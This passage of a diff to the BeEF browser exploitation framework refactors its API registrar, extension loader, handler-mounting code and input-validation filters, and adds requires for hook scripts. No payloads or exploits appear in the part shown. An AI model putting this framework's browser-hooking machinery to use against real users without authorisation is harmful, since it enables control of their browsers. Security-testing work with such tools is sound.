        data = []
-        method = get_api_path(c, m)
+        method = get_api_path(clss, mthd)
        mods.each do |mod|
-          begin
-            # Only used for API Development (very verbose)
-            # print_info "API: #{mod} fired #{method}"
+          # Only used for API Development (very verbose)
+          # print_info "API: #{mod} fired #{method}"

-            result = mod[:owner].method(method).call(*args)
-            unless result.nil?
-              data << { :api_id => mod[:id], :data => result }
-            end
-          rescue => e
-            print_error "API Fire Error: #{e.message} in #{mod}.#{method}()"
-          end
+          result = mod[:owner].method(method).call(*args)
+          data << { api_id: mod[:id], data: result } unless result.nil?
+        rescue StandardError => e
+          print_error "API Fire Error: #{e.message} in #{mod}.#{method}()"
        end

        data
@@ -214,8 +212,7 @@ require 'core/api/modules'
 require 'core/api/extension'
 require 'core/api/extensions'
 require 'core/api/main/migration'
-require 'core/api/main/network_stack/assethandler.rb'
+require 'core/api/main/network_stack/assethandler'
 require 'core/api/main/server'
 require 'core/api/main/server/hook'
 require 'core/api/main/configuration'
-
--- a/core/api/extension.rb
+++ b/core/api/extension.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -7,14 +7,11 @@
 module BeEF
  module API
    module Extension
-
      attr_reader :full_name, :short_name, :description

      @full_name = ''
      @short_name = ''
      @description = ''
-
    end
-
  end
 end
--- a/core/api/extensions.rb
+++ b/core/api/extensions.rb
@@ -1,21 +1,18 @@
 #
-# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
  module API
    module Extensions
-
      # @note Defined API Paths
      API_PATHS = {
-          'post_load' => :post_load
-      }
+        'post_load' => :post_load
+      }.freeze

      # API hook fired after all extensions have been loaded
-      def post_load;
-      end
-
+      def post_load; end
    end
  end
 end
--- a/core/api/main/configuration.rb
+++ b/core/api/main/configuration.rb
@@ -1,22 +1,19 @@
 #
-# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
-module API
-  module Configuration 
-    
-    # @note Defined API Paths
-    API_PATHS = {
+  module API
+    module Configuration
+      # @note Defined API Paths
+      API_PATHS = {
        'module_configuration_load' => :module_configuration_load
-    }
-    
-    # Fires just after module configuration is loaded and merged
-    # @param [String] mod module key
-    def module_configuration_load(mod); end
+      }.freeze

+      # Fires just after module configuration is loaded and merged
+      # @param [String] mod module key
+      def module_configuration_load(mod); end
+    end
  end
-  
-end
 end
--- a/core/api/main/migration.rb
+++ b/core/api/main/migration.rb
@@ -1,21 +1,18 @@
 #
-# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
-module API
-  module Migration
-    
-    # @note Defined API Paths
-    API_PATHS = {
+  module API
+    module Migration
+      # @note Defined API Paths
+      API_PATHS = {
        'migrate_commands' => :migrate_commands
-    }
+      }.freeze

-    # Fired just after the migration process
-    def migrate_commands; end
-    
+      # Fired just after the migration process
+      def migrate_commands; end
+    end
  end
-  
-end
 end
--- a/core/api/main/network_stack/assethandler.rb
+++ b/core/api/main/network_stack/assethandler.rb
@@ -1,36 +1,34 @@
 #
-# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
-module API
-module NetworkStack
-module Handlers
-module AssetHandler
+  module API
+    module NetworkStack
+      module Handlers
+        module AssetHandler
+          # Binds a file to be accessible by the hooked browser
+          # @param [String] file file to be served
+          # @param [String] path URL path to be bound, if no path is specified a randomly generated one will be used
+          # @param [String] extension to be used in the URL
+          # @param [Integer] count amount of times the file can be accessed before being automatically unbound. (-1 = no limit)
+          # @return [String] URL bound to the specified file
+          # @todo Add hooked browser parameter to only allow specified hooked browsers access to the bound URL. Waiting on Issue #336
+          # @note This is a direct API call and does not have to be registered to be used
+          def self.bind(file, path = nil, extension = nil, count = -1)
+            BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind(file, path, extension, count)
+          end

-    # Binds a file to be accessible by the hooked browser
-    # @param [String] file file to be served
-    # @param [String] path URL path to be bound, if no path is specified a randomly generated one will be used
-    # @param [String] extension to be used in the URL
-    # @param [Integer] count amount of times the file can be accessed before being automatically unbound. (-1 = no limit)
-    # @return [String] URL bound to the specified file
-    # @todo Add hooked browser parameter to only allow specified hooked browsers access to the bound URL. Waiting on Issue #336
-    # @note This is a direct API call and does not have to be registered to be used
-    def self.bind(file, path=nil, extension=nil, count=-1)
-        return BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind(file, path, extension, count)
+          # Unbinds a file made accessible to hooked browsers
+          # @param [String] url the bound URL
+          # @todo Add hooked browser parameter to only unbind specified hooked browsers binds. Waiting on Issue #336
+          # @note This is a direct API call and does not have to be registered to be used
+          def self.unbind(url)
+            BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind(url)
+          end
+        end
+      end
    end
-
-    # Unbinds a file made accessible to hooked browsers
-    # @param [String] url the bound URL
-    # @todo Add hooked browser parameter to only unbind specified hooked browsers binds. Waiting on Issue #336
-    # @note This is a direct API call and does not have to be registered to be used
-    def self.unbind(url)
-        BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind(url)
-    end
-
-end
-end
-end
-end
+  end
 end
--- a/core/api/main/server.rb
+++ b/core/api/main/server.rb
@@ -1,43 +1,40 @@
 #
-# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
-module API
-module Server
-
-    # @note Defined API Paths
-    API_PATHS = {
+  module API
+    module Server
+      # @note Defined API Paths
+      API_PATHS = {
        'mount_handler' => :mount_handler,
        'pre_http_start' => :pre_http_start
-    }
-    
-    # Fires just before the HTTP Server is started
-    # @param [Object] http_hook_server HTTP Server object
-    def pre_http_start(http_hook_server); end
-    
-    # Fires just after handlers have been mounted
-    # @param [Object] server HTTP Server object
-    def mount_handler(server); end
-    
-    # Mounts a handler
-    # @param [String] url URL to be mounted
-    # @param [Class] http_handler_class the handler Class
-    # @param [Array] args an array of arguments
-    # @note This is a direct API call and does not have to be registered to be used
-    def self.mount(url, http_handler_class, args = nil)
-      BeEF::Core::Server.instance.mount(url, http_handler_class, *args)
-    end
+      }.freeze

-    # Unmounts a handler
-    # @param [String] url URL to be unmounted
-    # @note This is a direct API call and does not have to be registered to be used
-    def self.unmount(url)
+      # Fires just before the HTTP Server is started
+      # @param [Object] http_hook_server HTTP Server object
+      def pre_http_start(http_hook_server); end
+
+      # Fires just after handlers have been mounted
+      # @param [Object] server HTTP Server object
+      def mount_handler(server); end
+
+      # Mounts a handler
+      # @param [String] url URL to be mounted
+      # @param [Class] http_handler_class the handler Class
+      # @param [Array] args an array of arguments
+      # @note This is a direct API call and does not have to be registered to be used
+      def self.mount(url, http_handler_class, args = nil)
+        BeEF::Core::Server.instance.mount(url, http_handler_class, *args)
+      end
+
+      # Unmounts a handler
+      # @param [String] url URL to be unmounted
+      # @note This is a direct API call and does not have to be registered to be used
+      def self.unmount(url)
        BeEF::Core::Server.instance.unmount(url)
+      end
    end
-
-  
-end
-end
+  end
 end
--- a/core/api/main/server/hook.rb
+++ b/core/api/main/server/hook.rb
@@ -1,24 +1,21 @@
 #
-# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
-module API
-module Server
-  module Hook 
+  module API
+    module Server
+      module Hook
+        # @note Defined API Paths
+        API_PATHS = {
+          'pre_hook_send' => :pre_hook_send
+        }.freeze

-    # @note Defined API Paths
-    API_PATHS = {
-        'pre_hook_send' => :pre_hook_send
-    }
-    
-    # Fires just before the hook is sent to the hooked browser
-    # @param [Class] handler the associated handler Class
-    def pre_hook_send(handler); end
-    
+        # Fires just before the hook is sent to the hooked browser
+        # @param [Class] handler the associated handler Class
+        def pre_hook_send(handler); end
+      end
+    end
  end
-  
-end
-end
 end
--- a/core/api/module.rb
+++ b/core/api/module.rb
@@ -1,26 +1,24 @@
 #
-# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
  module API
-
    module Command
    end

    module Module
-
      # @note Defined API Paths
      API_PATHS = {
-          'pre_soft_load' => :pre_soft_load,
-          'post_soft_load' => :post_soft_load,
-          'pre_hard_load' => :pre_hard_load,
-          'post_hard_load' => :post_hard_load,
-          'get_options' => :get_options,
-          'get_payload_options' => :get_payload_options,
-          'override_execute' => :override_execute
-      }
+        'pre_soft_load' => :pre_soft_load,
+        'post_soft_load' => :post_soft_load,
+        'pre_hard_load' => :pre_hard_load,
+        'post_hard_load' => :post_hard_load,
+        'get_options' => :get_options,
+        'get_payload_options' => :get_payload_options,
+        'override_execute' => :override_execute
+      }.freeze

      # Fired before a module soft load
      # @param [String] mod module key of module about to be soft loaded
@@ -54,8 +52,6 @@ module BeEF
      # @return [Hash] a hash of options
      # @note the option hash is merged with all other API hook's returned hash. Hooking this API method prevents the default options being returned.
      def get_payload_options; end
-
    end
-
  end
 end
--- a/core/api/modules.rb
+++ b/core/api/modules.rb
@@ -1,22 +1,18 @@
 #
-# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
  module API
-
    module Modules
-
      # @note Defined API Paths
      API_PATHS = {
-          'post_soft_load' => :post_soft_load
-      }
+        'post_soft_load' => :post_soft_load
+      }.freeze

      # Fires just after all modules are soft loaded
      def post_soft_load; end
-
    end
-
  end
 end
--- a/core/bootstrap.rb
+++ b/core/bootstrap.rb
@@ -1,11 +1,10 @@
 #
-# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
  module Core
-
  end
 end

@@ -13,10 +12,11 @@ end
 require 'core/main/router/router'
 require 'core/main/router/api'

-
 ## @note Include http server functions for beef
 require 'core/main/server'
 require 'core/main/handlers/modules/beefjs'
+require 'core/main/handlers/modules/legacybeefjs'
+require 'core/main/handlers/modules/multistagebeefjs'
 require 'core/main/handlers/modules/command'
 require 'core/main/handlers/commands'
 require 'core/main/handlers/hookedbrowsers'
--- a/core/core.rb
+++ b/core/core.rb
@@ -1,12 +1,11 @@
 #
-# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
-module Core
-  
-end
+  module Core
+  end
 end

 # @note Includes database models - the order must be consistent otherwise DataMapper goes crazy
@@ -20,6 +19,7 @@ require 'core/main/models/optioncache'
 require 'core/main/models/browserdetails'
 require 'core/main/models/rule'
 require 'core/main/models/execution'
+require 'core/main/models/legacybrowseruseragents'

 # @note Include the constants
 require 'core/main/constants/browsers'
@@ -38,4 +38,3 @@ require 'core/main/geoip'
 # @note Include the command line parser and the banner printer
 require 'core/main/console/commandline'
 require 'core/main/console/banners'
-
--- a/core/extension.rb
+++ b/core/extension.rb
@@ -1,11 +1,10 @@
 #
-# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
  module Extension
-
    # Checks to see if extension is set inside the configuration
    # @param [String] ext the extension key
    # @return [Boolean] whether or not the extension exists in BeEF's configuration
@@ -15,9 +14,10 @@ module BeEF

    # Checks to see if extension is enabled in configuration
    # @param [String] ext the extension key
-    # @return [Boolean] whether or not the extension is enabled 
+    # @return [Boolean] whether or not the extension is enabled
    def self.is_enabled(ext)
      return false unless is_present(ext)
+
      BeEF::Core::Configuration.instance.get("beef.extension.#{ext}.enable") == true
    end

@@ -26,10 +26,11 @@ module BeEF
    # @return [Boolean] whether or not the extension is loaded
    def self.is_loaded(ext)
      return false unless is_enabled(ext)
+
      BeEF::Core::Configuration.instance.get("beef.extension.#{ext}.loaded") == true
    end

-    # Loads an extension 
+    # Loads an extension
    # @param [String] ext the extension key
    # @return [Boolean] whether or not the extension loaded successfully
    def self.load(ext)
@@ -41,7 +42,7 @@ module BeEF
      end
      print_error "Unable to load extension '#{ext}'"
      false
-    rescue => e
+    rescue StandardError => e
      print_error "Unable to load extension '#{ext}':"
      print_more e.message
    end
--- a/core/extensions.rb
+++ b/core/extensions.rb
@@ -1,32 +1,40 @@
 #
-# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
  module Extensions
-
    # Returns configuration of all enabled extensions
    # @return [Array] an array of extension configuration hashes that are enabled
    def self.get_enabled
-      BeEF::Core::Configuration.instance.get('beef.extension').select { |k,v| v['enable'] == true }
+      BeEF::Core::Configuration.instance.get('beef.extension').select { |_k, v| v['enable'] == true }
+    rescue StandardError => e
+      print_error "Failed to get enabled extensions: #{e.message}"
+      print_error e.backtrace
    end

    # Returns configuration of all loaded extensions
    # @return [Array] an array of extension configuration hashes that are loaded
    def self.get_loaded
-      BeEF::Core::Configuration.instance.get('beef.extension').select {|k,v| v['loaded'] == true }
+      BeEF::Core::Configuration.instance.get('beef.extension').select { |_k, v| v['loaded'] == true }
+    rescue StandardError => e
+      print_error "Failed to get loaded extensions: #{e.message}"
+      print_error e.backtrace
    end

    # Load all enabled extensions
    # @note API fire for post_load
    def self.load
      BeEF::Core::Configuration.instance.load_extensions_config
-      self.get_enabled.each { |k,v|
+      get_enabled.each do |k, _v|
        BeEF::Extension.load k
-      }
+      end
      # API post extension load
      BeEF::API::Registrar.instance.fire BeEF::API::Extensions, 'post_load'
+    rescue StandardError => e
+      print_error "Failed to load extensions: #{e.message}"
+      print_error e.backtrace
    end
  end
 end
--- a/core/filters.rb
+++ b/core/filters.rb
@@ -1,11 +1,10 @@
 #
-# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
  module Filters
-
  end
 end

--- a/core/filters/base.rb
+++ b/core/filters/base.rb
@@ -1,199 +1,214 @@
 #
-# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
-module Filters
+  module Filters
+    # Check if the string is not empty and not nil
+    #   @param [String] str String for testing
+    #   @return [Boolean] Whether the string is not empty
+    def self.is_non_empty_string?(str)
+      return false if str.nil?
+      return false unless str.is_a? String
+      return false if str.empty?

-  # Check if the string is not empty and not nil
-  #   @param [String] str String for testing
-  #   @return [Boolean] Whether the string is not empty
-  def self.is_non_empty_string?(str)
-    return false if str.nil?
-    return false unless str.is_a? String
-    return false if str.empty?
-    true
+      true
+    end
+
+    # Check if only the characters in 'chars' are in 'str'
+    #   @param [String] chars List of characters to match
+    #   @param [String] str String for testing
+    #   @return [Boolean] Whether or not the only characters in str are specified in chars
+    def self.only?(chars, str)
+      regex = Regexp.new('[^' + chars + ']')
+      regex.match(str.encode('UTF-8', invalid: :replace, undef: :replace, replace: '')).nil?
+    end
+
+    # Check if one or more characters in 'chars' are in 'str'
+    #   @param [String] chars List of characters to match
+    #   @param [String] str String for testing
+    #   @return [Boolean] Whether one of the characters exists in the string
+    def self.exists?(chars, str)
+      regex = Regexp.new(chars)
+      !regex.match(str.encode('UTF-8', invalid: :replace, undef: :replace, replace: '')).nil?
+    end
+
+    # Check for null char
+    #   @param [String] str String for testing
+    #   @return [Boolean] If the string has a null character
+    def self.has_null?(str)
+      return false unless is_non_empty_string?(str)
+
+      exists?('\x00', str)
+    end
+
+    # Check for non-printable char
+    #   @param [String] str String for testing
+    #   @return [Boolean] Whether or not the string has non-printable characters
+    def self.has_non_printable_char?(str)
+      return false unless is_non_empty_string?(str)
+
+      !only?('[:print:]', str)
+    end
+
+    # Check if num characters only
+    #   @param [String] str String for testing
+    #   @return [Boolean] If the string only contains numbers
+    def self.nums_only?(str)
+      return false unless is_non_empty_string?(str)
+
+      only?('0-9', str)
+    end
+
+    # Check if valid float
+    #   @param [String] str String for float testing
+    #   @return [Boolean] If the string is a valid float
+    def self.is_valid_float?(str)
+      return false unless is_non_empty_string?(str)
+      return false unless only?('0-9\.', str)
+
+      !(str =~ /^\d+\.\d+$/).nil?
+    end
+
+    # Check if hex characters only
+    #   @param [String] str String for testing
+    #   @return [Boolean] If the string only contains hex characters
+    def self.hexs_only?(str)
+      return false unless is_non_empty_string?(str)
+
+      only?('0123456789ABCDEFabcdef', str)
+    end
+
+    # Check if first character is a number
+    #   @param [String] String for testing
+    #   @return [Boolean] If the first character of the string is a number
+    def self.first_char_is_num?(str)
+      return false unless is_non_empty_string?(str)
+
+      !(str =~ /^\d.*/).nil?
+    end
+
+    # Check for space characters: \t\n\r\f
+    #   @param [String] str String for testing
+    #   @return [Boolean] If the string has a whitespace character
+    def self.has_whitespace_char?(str)
+      return false unless is_non_empty_string?(str)
+
+      exists?('\s', str)
+    end
+
+    # Check for non word characters: a-zA-Z0-9
+    #   @param [String] str String for testing
+    #   @return [Boolean] If the string only has alphanums
+    def self.alphanums_only?(str)
+      return false unless is_non_empty_string?(str)
+
+      only?('a-zA-Z0-9', str)
+    end
+
+    # @overload self.is_valid_ip?(ip, version)
+    # Checks if the given string is a valid IP address
+    #   @param [String] ip string to be tested
+    #   @param [Symbol] version IP version (either <code>:ipv4</code> or <code>:ipv6</code>)
+    #   @return [Boolean] true if the string is a valid IP address, otherwise false
+    #
+    # @overload self.is_valid_ip?(ip)
+    # Checks if the given string is either a valid IPv4 or IPv6 address
+    #   @param [String] ip string to be tested
+    #   @return [Boolean] true if the string is a valid IPv4 or IPV6 address, otherwise false
+    def self.is_valid_ip?(ip, version = :both)
+      return false unless is_non_empty_string?(ip)
+
+      if case version.inspect.downcase
+         when /^:ipv4$/
+           ip =~ /^((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}
+             (25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])$/x
+         when /^:ipv6$/
+           ip =~ /^(([0-9a-f]{1,4}:){7,7}[0-9a-f]{1,4}|
+             ([0-9a-f]{1,4}:){1,7}:|
+             ([0-9a-f]{1,4}:){1,6}:[0-9a-f]{1,4}|
+             ([0-9a-f]{1,4}:){1,5}(:[0-9a-f]{1,4}){1,2}|
+             ([0-9a-f]{1,4}:){1,4}(:[0-9a-f]{1,4}){1,3}|
+             ([0-9a-f]{1,4}:){1,3}(:[0-9a-f]{1,4}){1,4}|
+             ([0-9a-f]{1,4}:){1,2}(:[0-9a-f]{1,4}){1,5}|
+             [0-9a-f]{1,4}:((:[0-9a-f]{1,4}){1,6})|
+             :((:[0-9a-f]{1,4}){1,7}|:)|
+             fe80:(:[0-9a-f]{0,4}){0,4}%[0-9a-z]{1,}|
+             ::(ffff(:0{1,4}){0,1}:){0,1}
+             ((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]).){3,3}
+             (25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|
+             ([0-9a-f]{1,4}:){1,4}:
+             ((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]).){3,3}
+             (25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))$/ix
+         when /^:both$/
+           is_valid_ip?(ip, :ipv4) || is_valid_ip?(ip, :ipv6)
+         end
+        true
+      else
+        false
+      end
+    end
+
+    # Checks if the given string is a valid private IP address
+    #   @param [String] ip string for testing
+    #   @return [Boolean] true if the string is a valid private IP address, otherwise false
+    # @note Includes RFC1918 private IPv4, private IPv6, and localhost 127.0.0.0/8, but does not include local-link addresses.
+    def self.is_valid_private_ip?(ip)
+      return false unless is_valid_ip?(ip)
+
+      ip =~ /\A(^127\.)|(^192\.168\.)|(^10\.)|(^172\.1[6-9]\.)|(^172\.2[0-9]\.)|(^172\.3[0-1]\.)|(^::1$)|(^[fF][cCdD])\z/ ? true : false
+    end
+
+    # Checks if the given string is a valid TCP port
+    #   @param [String] port string for testing
+    #   @return [Boolean] true if the string is a valid TCP port, otherwise false
+    def self.is_valid_port?(port)
+      valid = false
+      valid = true if port.to_i > 0 && port.to_i < 2**16
+      valid
+    end
+
+    # Checks if string is a valid domain name
+    #   @param [String] domain string for testing
+    #   @return [Boolean] If the string is a valid domain name
+    # @note Only validates the string format. It does not check for a valid TLD since ICANN's list of TLD's is not static.
+    def self.is_valid_domain?(domain)
+      return false unless is_non_empty_string?(domain)
+      return true if domain =~ /^[0-9a-z-]+(\.[0-9a-z-]+)*(\.[a-z]{2,}).?$/i
+
+      false
+    end
+
+    # Check for valid browser details characters
+    #   @param [String] str String for testing
+    #   @return [Boolean] If the string has valid browser details characters
+    # @note This function passes the \302\256 character which translates to the registered symbol (r)
+    def self.has_valid_browser_details_chars?(str)
+      return false unless is_non_empty_string?(str)
+
+      !(str =~ %r{[^\w\d\s()-.,;:_/!\302\256]}).nil?
+    end
+
+    # Check for valid base details characters
+    #   @param [String] str String for testing
+    #   @return [Boolean] If the string has only valid base characters
+    # @note This is for basic filtering where possible all specific filters must be implemented
+    # @note This function passes the \302\256 character which translates to the registered symbol (r)
+    def self.has_valid_base_chars?(str)
+      return false unless is_non_empty_string?(str)
+
+      (str =~ /[^\302\256[:print:]]/).nil?
+    end
+
+    # Verify the yes and no is valid
+    #   @param [String] str String for testing
+    #   @return [Boolean] If the string is either 'yes' or 'no'
+    def self.is_valid_yes_no?(str)
+      return false if has_non_printable_char?(str)
+      return false if str !~ /\A(Yes|No)\z/i
+
+      true
+    end
  end
-
-  # Check if only the characters in 'chars' are in 'str'
-  #   @param [String] chars List of characters to match
-  #   @param [String] str String for testing
-  #   @return [Boolean] Whether or not the only characters in str are specified in chars
-  def self.only?(chars, str)
-    regex = Regexp.new('[^' + chars + ']')
-    regex.match(str.encode('UTF-8', invalid: :replace, undef: :replace, replace: '')).nil?
-  end
-
-  # Check if one or more characters in 'chars' are in 'str'
-  #   @param [String] chars List of characters to match
-  #   @param [String] str String for testing
-  #   @return [Boolean] Whether one of the characters exists in the string
-  def self.exists?(chars, str)
-    regex = Regexp.new(chars)
-    not regex.match(str.encode('UTF-8', invalid: :replace, undef: :replace, replace: '')).nil?
-  end
-
-  # Check for null char
-  #   @param [String] str String for testing
-  #   @return [Boolean] If the string has a null character
-  def self.has_null? (str)
-    return false unless is_non_empty_string?(str)
-    exists?('\x00', str)
-  end
-
-  # Check for non-printable char
-  #   @param [String] str String for testing
-  #   @return [Boolean] Whether or not the string has non-printable characters
-  def self.has_non_printable_char?(str)
-    return false unless is_non_empty_string?(str)
-    not only?('[:print:]', str)
-  end
-
-  # Check if num characters only
-  #   @param [String] str String for testing
-  #   @return [Boolean] If the string only contains numbers
-  def self.nums_only?(str)
-    return false unless is_non_empty_string?(str)
-    only?('0-9', str)
-  end
-
-  # Check if valid float
-  #   @param [String] str String for float testing
-  #   @return [Boolean] If the string is a valid float
-  def self.is_valid_float?(str)
-    return false unless is_non_empty_string?(str)
-    return false unless only?('0-9\.', str)
-    not (str =~ /^[\d]+\.[\d]+$/).nil?
-  end
-
-  # Check if hex characters only
-  #   @param [String] str String for testing
-  #   @return [Boolean] If the string only contains hex characters
-  def self.hexs_only?(str)
-    return false unless is_non_empty_string?(str)
-    only?('0123456789ABCDEFabcdef', str)
-  end
-
-  # Check if first character is a number
-  #   @param [String] String for testing
-  #   @return [Boolean] If the first character of the string is a number
-  def self.first_char_is_num?(str)
-    return false unless is_non_empty_string?(str)
-    not (str =~ /^\d.*/).nil?
-  end
-
-  # Check for space characters: \t\n\r\f
-  #   @param [String] str String for testing
-  #   @return [Boolean] If the string has a whitespace character
-  def self.has_whitespace_char?(str)
-    return false unless is_non_empty_string?(str)
-    exists?('\s', str)
-  end
-
-  # Check for non word characters: a-zA-Z0-9
-  #   @param [String] str String for testing
-  #   @return [Boolean] If the string only has alphanums
-  def self.alphanums_only?(str)
-    return false unless is_non_empty_string?(str)
-    only?("a-zA-Z0-9", str)
-  end
-
-  # @overload self.is_valid_ip?(ip, version)
-  # Checks if the given string is a valid IP address
-  #   @param [String] ip string to be tested
-  #   @param [Symbol] version IP version (either <code>:ipv4</code> or <code>:ipv6</code>)
-  #   @return [Boolean] true if the string is a valid IP address, otherwise false
-  #
-  # @overload self.is_valid_ip?(ip)
-  # Checks if the given string is either a valid IPv4 or IPv6 address
-  #   @param [String] ip string to be tested
-  #   @return [Boolean] true if the string is a valid IPv4 or IPV6 address, otherwise false
-  def self.is_valid_ip?(ip, version = :both)
-    return false unless is_non_empty_string?(ip)
-    valid = case version.inspect.downcase
-      when /^:ipv4$/
-        ip =~ /^((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}
-          (25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])$/x
-      when /^:ipv6$/
-        ip =~ /^(([0-9a-f]{1,4}:){7,7}[0-9a-f]{1,4}|
-          ([0-9a-f]{1,4}:){1,7}:|
-          ([0-9a-f]{1,4}:){1,6}:[0-9a-f]{1,4}|
-          ([0-9a-f]{1,4}:){1,5}(:[0-9a-f]{1,4}){1,2}|
-          ([0-9a-f]{1,4}:){1,4}(:[0-9a-f]{1,4}){1,3}|
-          ([0-9a-f]{1,4}:){1,3}(:[0-9a-f]{1,4}){1,4}|
-          ([0-9a-f]{1,4}:){1,2}(:[0-9a-f]{1,4}){1,5}|
-          [0-9a-f]{1,4}:((:[0-9a-f]{1,4}){1,6})|
-          :((:[0-9a-f]{1,4}){1,7}|:)|
-          fe80:(:[0-9a-f]{0,4}){0,4}%[0-9a-z]{1,}|
-          ::(ffff(:0{1,4}){0,1}:){0,1}
-          ((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]).){3,3}
-          (25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|
-          ([0-9a-f]{1,4}:){1,4}:
-          ((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]).){3,3}
-          (25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))$/ix
-      when /^:both$/
-        is_valid_ip?(ip, :ipv4) || is_valid_ip?(ip, :ipv6)
-    end ? true : false
-
-    valid
-  end
-
-  # Checks if the given string is a valid private IP address
-  #   @param [String] ip string for testing
-  #   @return [Boolean] true if the string is a valid private IP address, otherwise false
-  # @note Includes RFC1918 private IPv4, private IPv6, and localhost 127.0.0.0/8, but does not include local-link addresses.
-  def self.is_valid_private_ip?(ip)
-    return false unless is_valid_ip?(ip)
-    return ip =~ /\A(^127\.)|(^192\.168\.)|(^10\.)|(^172\.1[6-9]\.)|(^172\.2[0-9]\.)|(^172\.3[0-1]\.)|(^::1$)|(^[fF][cCdD])\z/ ? true : false
-  end
-
-  # Checks if the given string is a valid TCP port
-  #   @param [String] port string for testing
-  #   @return [Boolean] true if the string is a valid TCP port, otherwise false
-  def self.is_valid_port?(port)
-    valid = false
-    valid = true if port.to_i > 0 && port.to_i < 2**16
-    valid
-  end
-
-  # Checks if string is a valid domain name
-  #   @param [String] domain string for testing
-  #   @return [Boolean] If the string is a valid domain name
-  # @note Only validates the string format. It does not check for a valid TLD since ICANN's list of TLD's is not static.
-  def self.is_valid_domain?(domain)
-    return false unless is_non_empty_string?(domain)
-    return true if domain =~ /^[0-9a-z-]+(\.[0-9a-z-]+)*(\.[a-z]{2,}).?$/i
-    false
-  end
-
-  # Check for valid browser details characters
-  #   @param [String] str String for testing
-  #   @return [Boolean] If the string has valid browser details characters
-  # @note This function passes the \302\256 character which translates to the registered symbol (r)
-  def self.has_valid_browser_details_chars?(str)
-    return false unless is_non_empty_string?(str)
-    not (str =~ /[^\w\d\s()-.,;:_\/!\302\256]/).nil?  
-  end  
-
-  # Check for valid base details characters
-  #   @param [String] str String for testing
-  #   @return [Boolean] If the string has only valid base characters
-  # @note This is for basic filtering where possible all specific filters must be implemented
